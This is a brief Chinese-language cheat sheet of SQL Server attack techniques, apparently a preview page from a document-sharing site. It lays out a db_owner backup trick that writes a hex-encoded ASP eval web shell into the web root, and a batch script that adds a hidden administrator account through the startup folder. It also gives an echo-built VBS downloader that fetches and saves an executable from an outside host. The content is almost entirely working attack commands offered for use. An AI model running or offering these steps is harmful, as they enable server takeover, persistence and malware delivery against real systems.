SELECT IS_MEMBER('sysadmin')
db_owner提权(server2003)
差异备份拿shell
alter database 你的数据库名字 set RECOVERY FULL--
create table cmd (a image)--
backup database 你的数据库名字 to disk ='C:\\inetpub\\wwwroot\\1\\test.asp' with init--
insert into cmd (a) values (0x3C256576616C20726571756573742822646565702229253E)--
backup log 你的数据库名字 to disk = 'C:\\inetpub\\wwwroot\\1\\test1.asp'--
drop table cmd--
在数据库中新建一个表,将要执行的代码转成16进制,然后插入到表中,把表中数据备份成一个bat文件到系统启动项
//bat运行
@echo off
@cd %windir%
@net user admin admin /add
@net localgroup administrators admin /add
@del start.bat
@exit
@
下载者
echo Set P=createObject("Microsoft.XMLHTTP")>s.vbs
echo P.Open "GET","http://www.aaa.com/1.exe",0 >>s.vbs
echo P.Send():set G=createObject("ADODB.Stream")>>s.vbs
echo G.Mode=3:G.Type=1:G.Open() >>s.vbs
echo G.Write P.responseBody:G.SaveToFile "1.exe",2 >>s.vbs
s.vbs
本内容试读结束,登录后可阅读更多
下载后可阅读完整内容,剩余1页未读,立即下载